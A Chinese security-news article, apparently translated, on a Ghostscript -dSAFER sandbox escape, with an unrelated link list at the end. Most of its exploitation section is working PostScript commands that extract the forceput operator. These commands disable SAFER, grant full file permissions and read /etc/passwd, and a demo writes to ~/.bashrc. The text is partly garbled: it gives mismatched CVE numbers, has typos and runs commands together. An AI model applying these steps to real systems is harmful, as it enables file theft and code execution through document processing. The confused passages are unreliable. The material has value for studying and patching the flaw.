Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术

2018 年 12 月 8 日 FreeBuf

前言

今天给大家分析的是一种新型的ghostscript-dSAFER沙盒逃逸技术,目前这项技术仍然适用于当前正在使用的所有ghostscript版本。我不知道这个漏洞存在多久了,反正我是觉得已经很久了…

本文提供的漏洞利用代码可以在最新的几个版本中正常运行,如果你想在evince、imagemagick、gimp或okular中查看代码的话,你还需要在~/.bashrc那里添加一行。因为nautilus将在没有任何用户交互的情况下自动调用evice-thumbnailer。如果你想触发这个漏洞的话,你只需要在运行了漏洞利用代码之后随便浏览一个网站就可以了。

taviso@ubuntu:~$convert exploit.jpg output.jpgtaviso@ubuntu:~$tail -1 ~/.bashrcechopwned by postscript

背景内容

Postscript的一个核心访问控制功能就是它能够标记可执行代码的运行过程,这样可以防止用户窥视系统程序的执行,并获取更强大的访问操作权限。为此,我专门设计了一个完整的漏洞利用代码,感兴趣的同学可以阅读原文下载测试【下载地址】。

当你在errordict中安装了错误处理器之后,如果你终止了一个正在执行的操作进程,这样便会将错误操作符暴露给错误处理器。此时,,rrorerdict便会忽略-dSAFER沙箱,这也就是本文所利用的漏洞CVE-2018-17183。

漏洞利用细节

需要注意的是,这个漏洞目前还没有被完全修复,因为你现在仍然可以调用错误处理器,并触发错误,或者访问内部状态所保存的错误处理器。

其中一种漏洞利用方法为,找到能够终止运行的执行进程,触发一次异常,然后调用错误处理器并终止它的运行(可以通过/stackoverflow或/execoverflow来实现)。当出现故障时,操作码堆栈将会处于一种不一致的状态,因为ghostscript会尝试设置错误处理器,但这种设置是无效的。

漏洞利用方式

首先,用垃圾数据填充堆栈,只给错误处理器留下一小部分空间:

GS>01 300368 {} for

然后通过修改pdfopdict(改为非字典形式)来让/switch_to_normal_marking_ops发生错误:

GS<300369>/pdfopdict null def

调用/switch_to_normal_marking_ops(当前正在执行状态中):

GS<300369>GS_PDF_ProcSet/switch_to_normal_marking_ops get stopped

操作会失败,因为/typecheck正在写入pdfopdict:

GS<2>==True

查看已保存堆栈中的最后几个元素:

GS<1>dupdup length 10 sub 10 getinterval ==[300364300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]

大家可以看到,错误的操作符已经准备传递给错误处理器了。

其中,forceput是一个非常强大的操作符,它可以忽略所有的访问控制,我们可以把它从堆栈中提取出来,然后用它来做我们想做的事情:

systemdict/SAFER false forceputsystemdict/userparams get /PermitFileControl [(*)] forceputsystemdict/userparams get /PermitFileWriting [(*)] forceputsystemdict/userparams get /PermitFileReading [(*)] forceput

结合之前所介绍的内容,我们看一看如何去读取/etc/passwd中的数据,下面给出的是一份DEMO:

$ gs-dSAFER -f test.ps GPLGhostscript GIT PRERELEASE 9.26 (2018-09-13)Copyright(C) 2018 Artifex Software, Inc.  Allrights reserved.Thissoftware comes with NO WARRANTY: see the file PUBLIC for details.(root:x:0:0:root:/root:/bin/bash)

漏洞利用代码

下载地址:【阅读原文下载

* 参考来源:mailclark,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

登录查看更多
0

相关内容

GIMP 是 GNU Image Manipulation Program(GNU 图像处理程序)的缩写,是一套跨平台开放源代码图像处理软件,是遵循 GNU 授权条款发布的自由软件。
【实用书】学习用Python编写代码进行数据分析,103页pdf
专知会员服务
192+阅读 · 2020年6月29日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【实用书】流数据处理,Streaming Data,219页pdf
专知会员服务
76+阅读 · 2020年4月24日
TensorFlow Lite指南实战《TensorFlow Lite A primer》,附48页PPT
专知会员服务
69+阅读 · 2020年1月17日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
用 TensorFlow hub 在 Keras 中做 ELMo 嵌入
AI研习社
5+阅读 · 2019年5月12日
Linux挖矿病毒的清除与分析
FreeBuf
14+阅读 · 2019年4月15日
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
已删除
创业邦杂志
5+阅读 · 2019年3月27日
基于Web页面验证码机制漏洞的检测
FreeBuf
7+阅读 · 2019年3月15日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
10个深度学习软件的安装指南(附代码)
数据派THU
17+阅读 · 2017年11月18日
Arxiv
3+阅读 · 2019年3月1日
Attend More Times for Image Captioning
Arxiv
6+阅读 · 2018年12月8日
Arxiv
3+阅读 · 2018年4月10日
VIP会员
相关资讯
用 TensorFlow hub 在 Keras 中做 ELMo 嵌入
AI研习社
5+阅读 · 2019年5月12日
Linux挖矿病毒的清除与分析
FreeBuf
14+阅读 · 2019年4月15日
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
已删除
创业邦杂志
5+阅读 · 2019年3月27日
基于Web页面验证码机制漏洞的检测
FreeBuf
7+阅读 · 2019年3月15日
如何用GitLab本地私有化部署代码库?
Python程序员
9+阅读 · 2018年12月29日
实战 | 40行代码实现人脸识别
七月在线实验室
3+阅读 · 2018年3月7日
10个深度学习软件的安装指南(附代码)
数据派THU
17+阅读 · 2017年11月18日
Top
微信扫码咨询专知VIP会员